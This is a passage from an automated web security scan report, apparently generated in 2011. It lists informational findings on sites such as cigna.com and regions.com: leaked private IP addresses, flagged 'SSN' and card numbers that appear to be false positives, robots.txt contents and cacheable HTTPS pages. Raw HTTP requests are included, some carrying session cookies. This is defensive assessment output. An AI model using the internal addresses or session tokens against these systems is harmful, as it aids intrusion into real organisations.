Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

Request

GET /js/hplogin.js HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:29:11 GMT
Content-length: 17885
Content-type: application/x-javascript
Cache-control: no-cache
Etag: "de405e41-1-0-45dd"
Last-modified: Wed, 16 Feb 2011 12:26:14 GMT
Accept-ranges: bytes
Connection: close

// Function for retrieving cookie values
function getCookie(name) {
   var dc = document.cookie;
   var prefix = name + "=";
   var begin = dc.indexOf("; " + prefix);
   if (begin == -1) {
       begin = dc.
...[SNIP]...
4qh45dlnyliqj)/Physician.aspx";}

   if (domain[0] == ("d-www.cigna.com")) {bni = "http://staging.arvatocim.com/cigna_general_redesign/(r2pvr2jci5g4qh45dlnyliqj)/Physician.aspx";}
   if (domain[0] == ("192.168.204.239")) {bni = "http://staging.arvatocim.com/cigna_general_redesign/(r2pvr2jci5g4qh45dlnyliqj)/Physician.aspx";}

   if (domain[0] == ("qawww.cigna.com")) {bni = "http://staging.arvatocim.com/cigna_general
...[SNIP]...
h45dlnyliqj)/Physician.aspx";}        
   if (domain[0] == ("qawww06.cigna.com")) {bni = "http://staging.arvatocim.com/cigna_general_redesign/(r2pvr2jci5g4qh45dlnyliqj)/Physician.aspx";}
   if (domain[0] == ("192.168.204.231")) {bni = "http://staging.arvatocim.com/cigna_general_redesign/(r2pvr2jci5g4qh45dlnyliqj)/Physician.aspx";}

   if (domain[0] == ("129.33.68.182")) {bni = "http://staging.arvatocim.com/cigna_general_r
...[SNIP]...
16. Social security numbers disclosed  previous  next
There are 3 instances of this issue:

Issue background

Responses containing social security numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid SSNs and whether their disclosure within the application is appropriate.

16.1. http://assets.olark.com/a/assets/v0/site/4116-752-10-3079.js  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://assets.olark.com
Path:   /a/assets/v0/site/4116-752-10-3079.js

Issue detail

The following social security number was disclosed in the response:

Request

GET /a/assets/v0/site/4116-752-10-3079.js?cb=1305562512331&v=Loader0c0f536a09e02c9c65b85007f2b60d66c HTTP/1.1
Host: assets.olark.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/forgot_password.php

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 16:24:22 GMT
Content-Type: application/x-javascript
Content-Length: 2617
Last-Modified: Mon, 16 May 2011 16:14:40 GMT
Connection: close
P3P: CP='Olark does not have a P3P policy. Learn why here: http://olark.com/p3p'
Accept-Ranges: bytes


(function(){


var isNewVersion = olark._ && olark._.versions && (olark._.versions.follow || olark._.versions.popout)
if(isNewVersion) {
olark._.finish
...[SNIP]...
nNhbGVzPTEmdXRtX21lZGl1bT13aWRnZXQmdXRtX2NhbXBhaWduPWZyZWVfc2FsZXMmdXRtX3NvdXJjZT00MTE2LTc1Mi0xMC0zMDc5IiBpZD0iaGJsaW5rOTkiICB0YXJnZXQ9Il9ibGFuayI+RnJlZSBPbGFyayBTYWxlcyBDaGF0PC9hPiE=","site_id":"4116-752-10-3079"}});
}else{
olark.configure(function(conf){
conf.system.site_id="4116-752-10-3079";
});
olark._.finish();
}
})();
16.2. http://www.placelocal.com/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.placelocal.com
Path:   /

Issue detail

The following social security number was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.placelocal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/forgot_password.php
Cookie: PHPSESSID=4d3oqoeopjg5os4f6kha7nto63; __utma=94208860.1014089333.1305558942.1305558942.1305562510.2; __utmc=94208860; __utmz=94208860.1305562510.2.2.utmcsr=paperg.com|utmccn=(referral)|utmcmd=referral|utmcct=/contact.php; __utmb=94208860.1.10.1305562510; olarkld=1305562510086; wcsid=82HE08PKOH0GNJJUGLKIDRZJ41167521; _oklv=1305562512332; hblid=2AUKUUQZQC24174KYBGUP1HK41167521

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 16:15:21 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: success=deleted; expires=Sun, 16-May-2010 16:15:20 GMT
Set-Cookie: success_cookie_name=deleted; expires=Sun, 16-May-2010 16:15:20 GMT
Vary: Accept-Encoding
Content-Length: 13932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
urn "static.olark.com/jsclient/loader0.js?ts="+(a?a[1]:(+new Date))})(document.cookie.match(/olarkld=([0-9]+)/)),name:"olark",methods:["configure","extend","declare","identify"]});olark.identify('4116-752-10-3079');/*]]>
...[SNIP]...
16.3. http://www.placelocal.com/forgot_password.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.placelocal.com
Path:   /forgot_password.php

Issue detail

The following social security number was disclosed in the response:

Request

GET /forgot_password.php HTTP/1.1
Host: www.placelocal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/contact.php
Cookie: PHPSESSID=4d3oqoeopjg5os4f6kha7nto63; __utma=94208860.1014089333.1305558942.1305558942.1305558942.1; __utmc=94208860; __utmz=94208860.1305558942.1.1.utmcsr=paperg.com|utmccn=(referral)|utmcmd=referral|utmcct=/company.php

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 16:15:07 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: success=deleted; expires=Sun, 16-May-2010 16:15:06 GMT
Set-Cookie: success_cookie_name=deleted; expires=Sun, 16-May-2010 16:15:06 GMT
Vary: Accept-Encoding
Content-Length: 8160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
urn "static.olark.com/jsclient/loader0.js?ts="+(a?a[1]:(+new Date))})(document.cookie.match(/olarkld=([0-9]+)/)),name:"olark",methods:["configure","extend","declare","identify"]});olark.identify('4116-752-10-3079');/*]]>
...[SNIP]...
17. Credit card numbers disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/makeRequest

Issue detail

The following credit card number was disclosed in the response:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /gadgets/makeRequest?refresh=3600&url=http%3A%2F%2Ffcgadgets.appspot.com%2Fs%2Ff%3Fn%3D0.5991967397276312%26pageurl%3Dhttp%3A%2F%2Fwww.cloudscan.me%2Fp%2Fenterprise-exploit-coverage-by-hoyt-llc.html&httpMethod=GET&headers=&postData=&authz=&st=&contentType=DOM&numEntries=3&getSummaries=false&signOwner=true&signViewer=true&gadget=http%3A%2F%2Ffcgadgets.appspot.com%2Fspec%2Fshareit.xml&container=peoplesense&bypassSpecCache=&getFullHeaders=false HTTP/1.1
Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
Referer: http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml&container=peoplesense&parent=http://www.cloudscan.me/&mid=0&view=profile&libs=google.blog&d=0.558.7&lang=en&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23666666%22,%22ENDCAP_LINK_COLOR%22:%22%233d74a5%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_HEADLINE_COLOR%22:%22%23666666%22,%22FONT_FACE%22:%22normal+normal+13px+Arial,+Tahoma,+Helvetica,+FreeSans,+sans-serif%22%7D%7D&communityId=00129212639365482611&caller=http://www.cloudscan.me/p/enterprise-exploit-coverage-by-hoyt-llc.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209791819.1305556363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=209791819.1517248625.1305556363.1305556363.1305556363.1; __utmc=209791819; __utmb=209791819.1.10.1305556363

Response

HTTP/1.1 200 OK
Expires: Mon, 16 May 2011 15:32:44 GMT
Content-Disposition: attachment;filename=p.txt
Content-Type: application/json; charset=UTF-8
Date: Mon, 16 May 2011 14:32:44 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public,max-age=3600
Age: 1
Content-Length: 379

throw 1; < don't be evil' >{"http://fcgadgets.appspot.com/s/f?n=0.5991967397276312&pageurl=http://www.cloudscan.me/p/enterprise-exploit-coverage-by-hoyt-llc.html":{"body":"\u003c?xml version=\"1.0\" encoding=\"UTF-8\" ?\u003e\r\n\u003cshareit\u003e\r\n \u003cshares\u003e\r\n \r\n
...[SNIP]...
18. Robots.txt file  previous  next
There are 13 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

18.1. http://ajax.googleapis.com/ajax/services/feed/load  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /ajax/services/feed/load

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Last-Modified: Mon, 23 Aug 2010 20:43:16 GMT
Date: Mon, 16 May 2011 17:08:06 GMT
Expires: Mon, 16 May 2011 17:08:06 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
18.2. http://cigna.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cigna.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cigna.com

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:29:11 GMT
Content-length: 507
Content-type: text/plain
Last-modified: Tue, 29 Jun 2010 13:49:12 GMT
Accept-ranges: bytes
Connection: close

# robots.txt for CIGNA.com 20070108

# General items
User-agent: *
Disallow: /cgi-bin/
Disallow: /css/
Disallow: /encryption/
Disallow: /images/
Disallow: /includes/
Disallow: /js/
Disallow: /kbase/
D
...[SNIP]...
18.3. http://feeds.bbci.co.uk/news/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Server: Apache
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=2886
Expires: Mon, 16 May 2011 15:38:44 GMT
Date: Mon, 16 May 2011 14:50:38 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...
18.4. https://my.cigna.com/web/public/guest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /web/public/guest

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: my.cigna.com

Response

HTTP/1.1 200 OK
connection: close
content-length: 139
content-type: text/plain
date: Mon, 16 May 2011 15:30:23 GMT
last-modified: Fri, 13 May 2011 17:34:39 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: WebSEAL/6.0.0.3 (Build 060807)

# robots.txt for myCIGNA.com 20110420

# Exclude Files From All Robots:

User-agent: *
Disallow: /web/secure/

# End robots.txt file
18.5. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=83079404
Expires: Thu, 02 Jan 2014 04:27:21 GMT
Date: Mon, 16 May 2011 14:50:37 GMT
Connection: close

User-agent: *
Disallow: /
18.6. http://themes.googleusercontent.com/image  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://themes.googleusercontent.com
Path:   /image

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: themes.googleusercontent.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 16 May 2011 14:32:33 GMT
Expires: Mon, 16 May 2011 14:32:33 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /
18.7. http://www.blogger.com/dyn-css/authorization.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogger.com
Path:   /dyn-css/authorization.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blogger.com

Response

HTTP/1.0 200 OK
Expires: Mon, 16 May 2011 15:32:31 GMT
Last-Modified: Tue, 10 May 2011 20:25:18 GMT
Content-Type: text/plain
Date: Mon, 16 May 2011 14:32:31 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public
Age: 0

# robots.txt for http://www.blogger.com

User-agent: *
Disallow: /profile-find.g
Disallow: /comment.g
Disallow: /email-post.g
Disallow: /share-post-menu.g
18.8. http://www.cloudscan.me/p/enterprise-exploit-coverage-by-hoyt-llc.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudscan.me
Path:   /p/enterprise-exploit-coverage-by-hoyt-llc.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cloudscan.me

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Expires: Mon, 16 May 2011 21:49:57 GMT
Date: Sun, 15 May 2011 21:49:57 GMT
Last-Modified: Sun, 15 May 2011 21:42:26 GMT
ETag: "1293c586-5e05-4af4-b87d-b4816aaf263f"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Age: 60152
Cache-Control: public, max-age=86400, proxy-revalidate, must-revalidate

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /search
Disallow: /related-content.g
Disallow: /related_content_helper.html

Sitemap: http://www.cloudscan.me/feeds/posts/default?o
...[SNIP]...
18.9. http://www.frontrowusa.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontrowusa.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.frontrowusa.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:22:42 GMT
Server: Apache
Last-Modified: Fri, 05 Nov 2010 19:53:17 GMT
ETag: "3278ca-21-49453a027c540"
Accept-Ranges: bytes
Content-Length: 33
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /Event/

18.10. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Mon, 16 May 2011 14:32:42 GMT
Expires: Mon, 16 May 2011 14:32:42 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js
18.11. http://www.placelocal.com/forgot_password.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.placelocal.com
Path:   /forgot_password.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.placelocal.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 15:19:41 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Thu, 30 Sep 2010 21:08:43 GMT
Accept-Ranges: bytes
Content-Length: 317
Cache-Control: max-age=604800
Expires: Mon, 23 May 2011 15:19:41 GMT
Vary: Accept-Encoding

# robots.txt - production environment
#
# In the production environment, we configure the webserver to serve
# this instead of the more restrictive default.
#
# See http://www.robotstxt.org/wc/norobot
...[SNIP]...
18.12. http://www.regions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.regions.com

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTP=R1694909573; path=/
Content-Length: 41
Content-Type: text/plain
Last-Modified: Fri, 01 Aug 2008 19:11:07 GMT
Accept-Ranges: bytes
ETag: "7727255aaf4c81:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:50 GMT
Connection: keep-alive

User-agent: *
Disallow: \VirtualMedia\
18.13. https://www.regions.com/personal_banking.rf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking.rf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.regions.com

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1387109651; path=/
Content-Length: 41
Content-Type: text/plain
Last-Modified: Fri, 01 Aug 2008 19:11:07 GMT
Accept-Ranges: bytes
ETag: "7727255aaf4c81:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:52 GMT
Connection: keep-alive

User-agent: *
Disallow: \VirtualMedia\
19. Cacheable HTTPS response  previous  next
There are 11 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

19.1. https://cignaforhcp.cigna.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cignaforhcp.cigna.com
Path:   /

Request

GET / HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
content-length: 273
content-type: text/html
date: Mon, 16 May 2011 15:31:32 GMT
last-modified: Sun, 15 May 2011 10:00:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: WebSEAL/6.0.0.3 (Build 060807)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<TITLE></TITLE>
</HEAD>
<body onLoad="document.webseal.submit();">        
       
...[SNIP]...
19.2. https://cignaforhcp.cigna.com/ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cignaforhcp.cigna.com
Path:   /ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico

Request

GET /ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; JSESSIONID_CHCP=0001na8X0IINOPnLxTXec-srnIs:84FF2VLHC; PD_STATEFUL_dd717822-289d-11e0-8e97-2054895daa77=%2Fwps; JSESSIONID=0000PZ1yjRG2WKh36hwOt68f6X_:15eoj2var; PD_STATEFUL_db12e020-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6; PD_STATEFUL_fab19a1c-356c-11e0-b99e-2054895daa77=%2Fportal

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 318
content-type: text/plain
date: Mon, 16 May 2011 15:31:58 GMT
last-modified: Mon, 20 Dec 2010 18:20:32 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_32910a44-289d-11e0-8e97-2054895daa77=%2FProviderTheme; Path=/

..............(.......(....... ................................................................................................................    .......................    ......    ...............    .........
...[SNIP]...
19.3. https://cignaforhcp.cigna.com/corp/sso/styles/portal_styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cignaforhcp.cigna.com
Path:   /corp/sso/styles/portal_styles.css

Request

GET /corp/sso/styles/portal_styles.css HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Referer: https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/displayId.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=92964B127FD1107FCAD3A536181C0CE6; JSESSIONID=0000m0b58O_Mt6JKcD_nHJ5-y0C:15eoj2vv7; PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; JSESSIONID_CHCP=0001na8X0IINOPnLxTXec-srnIs:84FF2VLHC; PD_STATEFUL_dd717822-289d-11e0-8e97-2054895daa77=%2Fwps

Response

HTTP/1.1 200 OK
accept-ranges: bytes
content-length: 4554
content-type: text/css
date: Mon, 16 May 2011 15:30:17 GMT
etag: "110e-11ca-8685f4c0"
last-modified: Mon, 18 Oct 2010 12:43:39 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
age: 81

<style>

   body {
   background-color : #FFFFFF;
   }
   .cignabody {
       font-family: "Arial", sans-serif;
       font-size: 11pt;
       color: #000000;
       }

   P, TD, UL, span {
   font-family: "Arial",
...[SNIP]...
19.4. https://cignaforhcp.cigna.com/wps/CacheProxyServlet/colorPalette/default/browserVendor/Netscape/browserName/Navigator/browserVersion/unknown/locale/en/forwardurl/ProviderTheme/themes/html/CignaProvider2/js.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cignaforhcp.cigna.com
Path:   /wps/CacheProxyServlet/colorPalette/default/browserVendor/Netscape/browserName/Navigator/browserVersion/unknown/locale/en/forwardurl/ProviderTheme/themes/html/CignaProvider2/js.jsp

Request

GET /wps/CacheProxyServlet/colorPalette/default/browserVendor/Netscape/browserName/Navigator/browserVersion/unknown/locale/en/forwardurl/ProviderTheme/themes/html/CignaProvider2/js.jsp HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Referer: https://cignaforhcp.cigna.com/wps/portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
